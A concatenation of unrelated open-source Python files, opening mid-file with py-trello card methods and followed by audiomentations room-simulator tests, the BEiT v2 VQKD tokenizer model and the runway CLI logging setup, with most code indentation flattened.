"""Add a checklist to this card
:title: title of the checklist
:items: a list of the item names
:itemstates: a list of the state (True/False) of each item
:return: the checklist
"""
if itemstates is None:
itemstates = []
json_obj = self.client.fetch_json(
'/cards/' + self.id + '/checklists',
http_method='POST',
post_args={'name': title}, )
cl = Checklist(self.client, json_obj, trello_card=self.id)
for i, name in enumerate(items):
try:
checked = itemstates[i]
except IndexError:
checked = False
cl.add_checklist_item(name, checked)
self.fetch()
return cl
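    # A usage sketch:
    #
    #   cl = card.add_checklist("Release steps",
    #                           ["tag version", "build", "publish"],
    #                           itemstates=[True, False, False])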
def _set_due_complete(self, is_complete):
"""Set due is complete or not complete
https://developers.trello.com/advanced-reference/card#put-1-cards-card-id-or-shortlink-dueComplete
:param is_complete: boolean
:return: None
"""
self.client.fetch_json('/cards/' + self.id + '/dueComplete',
http_method='PUT',
post_args={'value': is_complete})
def _set_remote_attribute(self, attribute, value):
self.client.fetch_json(
'/cards/' + self.id + '/' + attribute,
http_method='PUT',
post_args={'value': value}, )
def _post_remote_data(self, attribute, files=None, **kwargs):
return self.client.fetch_json(
'/cards/' + self.id + '/' + attribute,
http_method='POST',
files=files,
post_args=kwargs)
def get_custom_field_by_name(self, cf_name):
"""
Returns existing custom field by name or creates a new one.
"""
for cf in self.customFields:
if cf.name == cf_name:
return cf
cf_class = None
cf_def_id = None
for definition in self.board.get_custom_field_definitions():
if definition.name == cf_name:
cf_def_id = definition.id
cf_class = {
'checkbox': CustomFieldCheckbox,
'date': CustomFieldDate,
'list': CustomFieldList,
'number': CustomFieldNumber,
'text': CustomFieldText,
}.get(definition.field_type)
if cf_class is None:
raise ValueError('Unknown custom field name specified ({})'.format(cf_name))
return cf_class(self, 'unknown', cf_def_id, '')
from trello.trellolist import List
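
# A minimal end-to-end sketch (assumes py-trello is installed; the key, token
# and card id below are placeholders, not real values):
if __name__ == '__main__':
    from trello import TrelloClient
    client = TrelloClient(api_key='YOUR_API_KEY', token='YOUR_TOKEN')
    board = client.list_boards()[0]
    card = board.get_card('CARD_ID')
    card.fetch(eager=False)
    print(card.name, card.due_date)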


# ---- File: tests/test_room_simulator.py (repo: iver56/audiomentations, MIT license) ----

import random
import numpy as np
import pytest
from audiomentations import RoomSimulator
DEBUG = False
def get_sinc_impulse(sample_rate, duration):
"""Create a `duration` seconds chirp from 0Hz to `nyquist frequency`"""
n = np.arange(-duration / 2, duration / 2, 1 / sample_rate)
# Full band sinc impulse centered at half the duration
samples = 2 * 0.25 * np.sinc(2 * sample_rate / 4 * n)
return samples.astype(np.float32)
class TestRoomSimulatorTransform:
def test_simulate_apply_parity(self):
"""
Tests whether RoomSimulator.apply gives the same result as Roomsimulator.room.simulate() in the 1D case.
This mainly tests that we took into consideration and compensated about the delays introduced when pyroomacoustics
computes the room impulse response.
See:[Create the Room Impulse Response](https://pyroomacoustics.readthedocs.io/en/pypi-release/pyroomacoustics.room.html?highlight=simulate#)
"""
random.seed(1)
sample_rate = 16000
samples = get_sinc_impulse(sample_rate, 10)
augment = RoomSimulator()
augmented_samples_apply = augment(samples=samples, sample_rate=sample_rate)
augment.room.simulate()
augmented_samples_simulate = augment.room.mic_array.signals.astype(
np.float32
).flatten()
assert np.all(augmented_samples_apply == augmented_samples_simulate)
def test_failing_case(self):
"""Failed case which identified a bug where the room created was not rectangular"""
sample_rate = 16000
samples = get_sinc_impulse(sample_rate, 10)
augment = RoomSimulator(
min_size_x=3.0,
min_size_y=4.0,
min_size_z=3.0,
max_size_x=3.0,
max_size_y=4.0,
max_size_z=3.0,
min_source_x=0.5,
min_source_y=0.5,
min_source_z=1.8,
max_source_x=0.5,
max_source_y=0.5,
max_source_z=1.8,
min_mic_distance=0.1,
max_mic_distance=0.1,
p=1.0,
)
augment(samples=samples, sample_rate=sample_rate)
@pytest.mark.parametrize("num_channels", [1, 2, 3])
def test_multichannel_input(self, num_channels):
random.seed(1)
sample_rate = 16000
samples = get_sinc_impulse(sample_rate, 10)
n_channels = np.tile(samples, (num_channels, 1))
augment = RoomSimulator(leave_length_unchanged=True)
# Setting the seed is important for reproduction
np.random.seed(1)
augmented_samples = augment(samples=samples, sample_rate=sample_rate)
assert augmented_samples.shape == samples.shape
augment.freeze_parameters()
np.random.seed(1)
augmented_n_channels = augment(samples=n_channels, sample_rate=sample_rate)
assert augmented_n_channels.shape == n_channels.shape
assert np.allclose(augmented_samples, augmented_n_channels[0])
@pytest.mark.parametrize("leave_length_unchanged", [True, False])
def test_input_with_absorption(self, leave_length_unchanged):
random.seed(1)
sample_rate = 16000
samples = get_sinc_impulse(sample_rate, 10)
augment = RoomSimulator(
p=1.0,
leave_length_unchanged=leave_length_unchanged,
)
processed_samples = augment(samples=samples, sample_rate=sample_rate)
# Store a measured rt60 parameter
theoretical_rt60 = augment.room.rt60_theory()
measured_rt60 = augment.room.measure_rt60()[0][0]
        # Tolerance chosen experimentally for this case
assert np.isclose(theoretical_rt60, measured_rt60, atol=0.065)
assert processed_samples.dtype == samples.dtype
assert not np.allclose(processed_samples[: len(samples)], samples)
assert len(processed_samples.shape) == 1
@pytest.mark.parametrize("leave_length_unchanged", [True, False])
def test_input_with_rt60(self, leave_length_unchanged):
random.seed(1)
sample_rate = 16000
samples = get_sinc_impulse(sample_rate, 10)
augment = RoomSimulator(
p=1.0,
calculation_mode="rt60",
min_target_rt60=0.3,
max_target_rt60=0.3,
leave_length_unchanged=leave_length_unchanged,
)
processed_samples = augment(samples=samples, sample_rate=sample_rate)
# Store a measured rt60 parameter
theoretical_rt60 = augment.room.rt60_theory()
measured_rt60 = augment.room.measure_rt60()[0][0]
        # Tolerances chosen experimentally for this case; the target rt60
        # is expected to deviate quite a bit.
assert np.isclose(0.3, theoretical_rt60, atol=0.05)
assert np.isclose(theoretical_rt60, measured_rt60, atol=0.065)
assert processed_samples.dtype == samples.dtype
assert not np.allclose(processed_samples[: len(samples)], samples)
assert len(processed_samples.shape) == 1
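
# A minimal usage sketch outside the test suite (assumes audiomentations and
# pyroomacoustics are installed; run this file directly to try it):
if __name__ == "__main__":
    sr = 16000
    impulse = get_sinc_impulse(sr, 10)
    transform = RoomSimulator(p=1.0, leave_length_unchanged=True)
    reverberant = transform(samples=impulse, sample_rate=sr)
    print(impulse.shape, reverberant.shape)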


# ---- File: beit2/modeling_vqkd.py (repo: microsoft/unilm) ----

# --------------------------------------------------------
# BEiT v2: Masked Image Modeling with Vector-Quantized Visual Tokenizers (https://arxiv.org/abs/2208.06366)
# Github source: https://github.com/microsoft/unilm/tree/master/beitv2
# Copyright (c) 2022 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# By Zhiliang Peng
# Based on VQGAN code bases
# https://github.com/CompVis/taming-transformers
# --------------------------------------------------------
import torch
import numpy as np
from torch import nn, einsum
import torch.nn.functional as F
import math
from collections import OrderedDict
from functools import partial, reduce
from einops import rearrange
from timm.models.layers import trunc_normal_
from timm.data.constants import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD
from timm.models.registry import register_model
from modeling_finetune import VisionTransformer
from norm_ema_quantizer import NormEMAVectorQuantizer
import utils
from vqkd_teacher import clip, get_dino_vit_base
class VQKD(nn.Module):
def __init__(self,
encoder_config,
decoder_config,
n_embed=8192,
embed_dim=32,
decay=0.99,
process_type='default',
quantize_kmeans_init=True,
teacher_model_type='clip',
decoder_out_dim=512,
rec_loss_type='cosine',
**kwargs
):
super().__init__()
print(kwargs)
if decoder_config['in_chans'] != embed_dim:
print(f"Rewrite the in_chans in decoder from {decoder_config['in_chans']} to {embed_dim}")
decoder_config['in_chans'] = embed_dim
# encoder & decode params
print('Final encoder config', encoder_config)
self.encoder = VisionTransformer(**encoder_config)
print('Final decoder config', decoder_config)
self.decoder = VisionTransformer(**decoder_config)
self.quantize = NormEMAVectorQuantizer(
n_embed=n_embed, embedding_dim=embed_dim, beta=1.0, kmeans_init=quantize_kmeans_init, decay=decay,
)
self.patch_size = encoder_config['patch_size']
self.token_shape = (encoder_config['img_size'] // self.patch_size, encoder_config['img_size'] // self.patch_size)
## Teacher model setting
self.teacher_model_type = teacher_model_type
self.decoder_out_dim = decoder_out_dim
if self.teacher_model_type == 'clip':
self.scaling_layer = ScalingLayerForClip()
self.teacher_model, _ = clip.load("ViT-B/16", device='cpu', jit=False)
self.decoder_out_dim = 512
elif self.teacher_model_type == 'dino':
self.scaling_layer = ScalingLayerForIM()
self.teacher_model = get_dino_vit_base()
self.decoder_out_dim = 768
else:
self.teacher_model = None
if self.teacher_model is not None:
for param in self.teacher_model.parameters():
                param.requires_grad = False  # freeze the teacher model
self.teacher_model.eval()
self.teacher_input_size = kwargs.get('teacher_input_size', 224)
# task layer
self.encode_task_layer = nn.Sequential(
nn.Linear(encoder_config['embed_dim'], encoder_config['embed_dim']),
nn.Tanh(),
nn.Linear(encoder_config['embed_dim'], embed_dim) # for quantize
)
self.decode_task_layer = nn.Sequential(
nn.Linear(decoder_config['embed_dim'], decoder_config['embed_dim']),
nn.Tanh(),
nn.Linear(decoder_config['embed_dim'], self.decoder_out_dim),
)
self.rec_loss_type = rec_loss_type
print(f"process type for VQKD: {process_type}")
self.process_type = process_type # in ['default', 'dall-e']
self.logit_laplace_eps = 0.1
self.kwargs = kwargs
self.encode_task_layer.apply(self._init_weights)
self.decode_task_layer.apply(self._init_weights)
def _init_weights(self, m):
if isinstance(m, nn.Linear):
trunc_normal_(m.weight, std=.02)
if isinstance(m, nn.Linear) and m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.LayerNorm):
nn.init.constant_(m.bias, 0)
nn.init.constant_(m.weight, 1.0)
@torch.jit.ignore
def no_weight_decay(self):
return {'quantize.embedding.weight', 'decoder.cls_token', 'decoder.pos_embed',
'encoder.cls_token', 'encoder.pos_embed'}
@property
def device(self):
return self.decoder.cls_token.device
def pre_process(self, data):
if self.process_type == 'default':
# TODO: modify for adapt
data = data.to(self.device)
if data.max() <= 1.:
data = data * 255.
data = data / 127.5 - 1.0
elif self.process_type == 'imagenet_norm':
mean = torch.as_tensor(IMAGENET_DEFAULT_MEAN).to(self.device)[None, :, None, None]
std = torch.as_tensor(IMAGENET_DEFAULT_STD).to(self.device)[None, :, None, None]
data = (data - mean) / std
return data
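    # Worked example for the 'default' branch: an input already in [0, 1] is
    # first scaled to [0, 255], then mapped to [-1, 1], so 1.0 becomes
    # 255 / 127.5 - 1.0 == 1.0 and 0.0 becomes -1.0.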
def get_number_of_tokens(self):
return self.quantize.n_e
def get_tokens(self, data, **kwargs):
data = self.pre_process(data)
quantize, embed_ind, loss = self.encode(data)
output = {}
output['token'] = embed_ind.view(data.shape[0], -1)
output['input_img'] = data
return output
def encode(self, x):
encoder_features = self.encoder(x, return_patch_tokens=True)
with torch.cuda.amp.autocast(enabled=False):
to_quantizer_features = self.encode_task_layer(encoder_features.type_as(self.encode_task_layer[-1].weight))
N = to_quantizer_features.shape[1]
h, w = int(math.sqrt(N)), int(math.sqrt(N))
to_quantizer_features = rearrange(to_quantizer_features, 'b (h w) c -> b c h w', h=h, w=w) # reshape for quantizer
quantize, loss, embed_ind = self.quantize(to_quantizer_features)
return quantize, embed_ind, loss
def decode(self, quantize, **kwargs):
# reshape tokens to feature maps for patch embed in decoder
# quantize = rearrange(quantize, 'b (h w) c -> b c h w', h=self.token_shape[0], w=self.token_shape[1])
decoder_features = self.decoder(quantize, return_patch_tokens=True)
rec = self.decode_task_layer(decoder_features)
return rec
def get_codebook_indices(self, x, **kwargs):
# for beit pre-training
return self.get_tokens(x, **kwargs)['token']
@torch.no_grad()
def get_regress_target(self, x, **kwargs):
norm_imgs = self.scaling_layer(x)
if self.teacher_model_type == 'clip':
target = self.teacher_model.encode_image(norm_imgs, return_all_tokens=True) @ self.teacher_model.visual.proj
elif self.teacher_model_type == 'dino':
target = self.teacher_model.forward(norm_imgs, return_patch_tokens=True)
else:
raise NotImplementedError
return target
def calculate_rec_loss(self, rec, target):
if self.rec_loss_type == 'cosine':
target = target / target.norm(dim=-1, keepdim=True)
rec = rec / rec.norm(dim=-1, keepdim=True)
rec_loss = (1 - (target * rec).sum(-1)).mean()
else:
raise NotImplementedError
return rec_loss
def forward(self, x, **kwargs):
"""
x: shape [B, 3, H, W] in [0, 1]
"""
x = self.pre_process(x) # rescale to [-1, 1]
target = self.get_regress_target(x, **kwargs)
quantize, embed_ind, emb_loss = self.encode(x)
xrec = self.decode(quantize)
rec_loss = self.calculate_rec_loss(xrec, target)
loss = emb_loss + rec_loss
log = {}
split="train" if self.training else "val"
log[f'{split}/quant_loss'] = emb_loss.detach().mean()
log[f'{split}/rec_loss'] = rec_loss.detach().mean()
log[f'{split}/total_loss'] = loss.detach().mean()
return loss, log
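
# A usage sketch for VQKD (hypothetical batch; the model factories are defined
# further down in this file):
#
#   model = vqkd_encoder_base_decoder_1x768x12_clip()
#   images = torch.rand(2, 3, 224, 224)          # values in [0, 1]
#   loss, log = model(images)                    # one tokenizer training step
#   tokens = model.get_codebook_indices(images)  # [2, 196] discrete code ids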
class ScalingLayerForClip(nn.Module):
def __init__(self):
super(ScalingLayerForClip, self).__init__()
self.register_buffer('shift', torch.Tensor([0.48145466, 0.4578275, 0.40821073])[None, :, None, None])
self.register_buffer('scale', torch.Tensor([0.26862954, 0.26130258, 0.27577711])[None, :, None, None])
def forward(self, inp):
inp = ((inp + 1.) * 127.5).clamp(0, 255.) / 255. # rescale to [0, 1.]
return (inp - self.shift) / self.scale
class ScalingLayerForIM(nn.Module):
def __init__(self):
super(ScalingLayerForIM, self).__init__()
        self.register_buffer('shift', torch.Tensor([0.485, 0.456, 0.406])[None, :, None, None])  # scaling for tokenizer with default process type in [-1, 1]
self.register_buffer('scale', torch.Tensor([0.229, 0.224, 0.225])[None, :, None, None])
def forward(self, inp):
inp = ((inp + 1.) * 127.5).clamp(0, 255.) / 255. # rescale to [0, 1.]
return (inp - self.shift) / self.scale
def get_model_default_params():
return dict(img_size=224, patch_size=16, in_chans=3, num_classes=1000, embed_dim=768, depth=12, num_heads=12,
mlp_ratio=4., qkv_bias=True, qk_scale=None, drop_rate=0., attn_drop_rate=0., drop_path_rate=0.,
norm_layer=partial(nn.LayerNorm, eps=1e-6), init_values=0., use_abs_pos_emb=True,
use_rel_pos_bias=False, use_shared_rel_pos_bias=False, use_mean_pooling=True, init_scale=0.001)
@register_model
def vqkd_encoder_base_decoder_1x768x12_clip(pretrained=False, pretrained_weight=None, as_tokenzer=False, img_size=224,
n_code=8192, code_dim=32, **kwargs):
encoder_config, decoder_config = get_model_default_params(), get_model_default_params()
# encoder settings
encoder_config['img_size'] = img_size
encoder_config['num_classes'] = 0
# decoder settings
decoder_config['img_size'] = img_size // decoder_config['patch_size']
decoder_config['patch_size'] = 1
decoder_config['in_chans'] = code_dim
decoder_config['num_classes'] = 0
decoder_config['depth'] = 1
# teacher settings
_ = kwargs.pop("teacher_model_type", "clip")
teacher_model_type = 'clip' if not as_tokenzer else 'None'
decoder_out_dim = 512
model = VQKD(encoder_config, decoder_config, n_code, code_dim, teacher_model_type=teacher_model_type,
decoder_out_dim=decoder_out_dim, **kwargs)
if as_tokenzer:
assert pretrained
assert pretrained_weight is not None
if pretrained_weight.startswith('https'):
weights = torch.hub.load_state_dict_from_url(pretrained_weight, map_location='cpu', check_hash=True)
else:
weights = torch.load(pretrained_weight, map_location='cpu')
if 'model' in weights:
weights = weights['model']
else:
weights = weights["state_dict"]
keys = list(weights.keys())
for k in keys:
if k.startswith("loss") or k.startswith("teacher") or k.startswith("scaling"):
del weights[k]
model.load_state_dict(weights)
return model
@register_model
def vqkd_encoder_base_decoder_3x768x12_clip(pretrained=False, pretrained_weight=None, as_tokenzer=False, img_size=224,
n_code=8192, code_dim=32, **kwargs):
encoder_config, decoder_config = get_model_default_params(), get_model_default_params()
# encoder settings
encoder_config['img_size'] = img_size
encoder_config['num_classes'] = 0
# decoder settings
decoder_config['img_size'] = img_size // decoder_config['patch_size']
decoder_config['patch_size'] = 1
decoder_config['in_chans'] = code_dim
decoder_config['num_classes'] = 0
decoder_config['depth'] = 3
# teacher settings
_ = kwargs.pop("teacher_model_type", "clip")
teacher_model_type = 'clip' if not as_tokenzer else 'None'
decoder_out_dim = 512
model = VQKD(encoder_config, decoder_config, n_code, code_dim, teacher_model_type=teacher_model_type,
decoder_out_dim=decoder_out_dim, **kwargs)
if as_tokenzer:
assert pretrained
assert pretrained_weight is not None
if pretrained_weight.startswith('https'):
weights = torch.hub.load_state_dict_from_url(pretrained_weight, map_location='cpu', check_hash=True)
else:
weights = torch.load(pretrained_weight, map_location='cpu')
if 'model' in weights:
weights = weights['model']
else:
weights = weights["state_dict"]
keys = list(weights.keys())
for k in keys:
if k.startswith("loss") or k.startswith("teacher") or k.startswith("scaling"):
del weights[k]
model.load_state_dict(weights)
return model
@register_model
def vqkd_encoder_base_decoder_1x768x12_dino(pretrained=False, pretrained_weight=None, as_tokenzer=False, img_size=224,
n_code=8192, code_dim=32, **kwargs):
encoder_config, decoder_config = get_model_default_params(), get_model_default_params()
# encoder settings
encoder_config['img_size'] = img_size
encoder_config['num_classes'] = 0
# decoder settings
decoder_config['img_size'] = img_size // decoder_config['patch_size']
decoder_config['patch_size'] = 1
decoder_config['in_chans'] = code_dim
decoder_config['num_classes'] = 0
decoder_config['depth'] = 1
# teacher settings
_ = kwargs.pop("teacher_model_type", "dino")
teacher_model_type = 'dino' if not as_tokenzer else 'None'
decoder_out_dim = 768
model = VQKD(encoder_config, decoder_config, n_code, code_dim, teacher_model_type=teacher_model_type,
decoder_out_dim=decoder_out_dim, **kwargs)
if as_tokenzer:
assert pretrained
assert pretrained_weight is not None
if pretrained_weight.startswith('https'):
weights = torch.hub.load_state_dict_from_url(pretrained_weight, map_location='cpu', check_hash=True)
else:
weights = torch.load(pretrained_weight, map_location='cpu')
if 'model' in weights:
weights = weights['model']
else:
weights = weights["state_dict"]
keys = list(weights.keys())
for k in keys:
if k.startswith("loss") or k.startswith("teacher") or k.startswith("scaling"):
del weights[k]
model.load_state_dict(weights)
return model
if __name__ == '__main__':
pass


# ---- File: runway/_cli/logs.py (repo: onicagroup/runway, Apache-2.0 license) ----

"""Runway CLI logging setup."""
import logging
import os
from typing import Any, Dict
import coloredlogs
from runway import LogLevels
from ..compat import cached_property
# COLOR_FORMAT = "%(levelname)s:%(name)s:\033[%(color)sm%(message)s\033[39m"
LOGGER = logging.getLogger("runway")
LOG_FORMAT = "[runway] %(message)s"
LOG_FORMAT_VERBOSE = logging.BASIC_FORMAT
LOG_FIELD_STYLES: Dict[str, Dict[str, Any]] = {
"asctime": {},
"hostname": {},
"levelname": {},
"message": {},
"name": {},
"prefix": {},
"programname": {},
}
LOG_LEVEL_STYLES: Dict[str, Dict[str, Any]] = {
"critical": {"color": "red", "bold": True},
"debug": {"color": "green"},
"error": {"color": "red"},
"info": {},
"notice": {"color": "yellow"},
"spam": {"color": "green", "faint": True},
"success": {"color": "green", "bold": True},
"verbose": {"color": "cyan"},
"warning": {"color": 214},
}
class LogSettings:
"""CLI log settings."""
ENV = {
"field_styles": os.getenv("RUNWAY_LOG_FIELD_STYLES"),
"fmt": os.getenv("RUNWAY_LOG_FORMAT"),
"level_styles": os.getenv("RUNWAY_LOG_LEVEL_STYLES"),
}
def __init__(
self, *, debug: int = 0, no_color: bool = False, verbose: bool = False
):
"""Instantiate class.
Args:
debug: Debug level.
no_color: Disable color in Runway's logs.
verbose: Whether to display verbose logs.
"""
self.debug = debug
self.no_color = no_color
self.verbose = verbose
@property
def coloredlogs(self) -> Dict[str, Any]:
"""Return settings for coloredlogs."""
return {
"fmt": self.fmt,
"field_styles": self.field_styles,
"level_styles": self.level_styles,
}
@cached_property
def fmt(self) -> str:
"""Return log record format.
If "RUNWAY_LOG_FORMAT" exists in the environment, it will be used.
"""
fmt = self.ENV["fmt"]
if isinstance(fmt, str):
return fmt
if self.debug or self.no_color or self.verbose:
return LOG_FORMAT_VERBOSE
return LOG_FORMAT
@cached_property
def field_styles(self) -> Dict[str, Any]:
"""Return log field styles.
If "RUNWAY_LOG_FIELD_STYLES" exists in the environment, it will be
used to update the Runway LOG_FIELD_STYLES.
"""
if self.no_color:
return {}
result = LOG_FIELD_STYLES.copy()
if self.ENV["field_styles"]:
result.update(
coloredlogs.parse_encoded_styles( # type: ignore
self.ENV["field_styles"]
)
)
return result
@cached_property
def level_styles(self) -> Dict[str, Any]:
"""Return log level styles.
If "RUNWAY_LOG_LEVEL_STYLES" exists in the environment, it will be
used to update the Runway LOG_LEVEL_STYLES.
"""
if self.no_color:
return {}
result = LOG_LEVEL_STYLES.copy()
if self.ENV["level_styles"]:
result.update(
coloredlogs.parse_encoded_styles( # type: ignore
self.ENV["level_styles"]
)
)
return result
@cached_property
def log_level(self) -> LogLevels:
"""Return log level to use."""
if self.debug:
return LogLevels.DEBUG
if self.verbose:
return LogLevels.VERBOSE
return LogLevels.INFO
def setup_logging(
*, debug: int = 0, no_color: bool = False, verbose: bool = False
) -> None:
"""Configure log settings for Runway CLI.
Keyword Args:
debug: Debug level (0-2).
        no_color: Disable colorized logs.
verbose: Use verbose logging.
"""
settings = LogSettings(debug=debug, no_color=no_color, verbose=verbose)
coloredlogs.install(settings.log_level, logger=LOGGER, **settings.coloredlogs)
LOGGER.debug("runway log level: %s", LOGGER.getEffectiveLevel())
if settings.debug == 2:
coloredlogs.install(
settings.log_level,
logger=logging.getLogger("botocore"),
**settings.coloredlogs,
)
LOGGER.debug("set dependency log level to debug")
LOGGER.debug("initialized logging for Runway")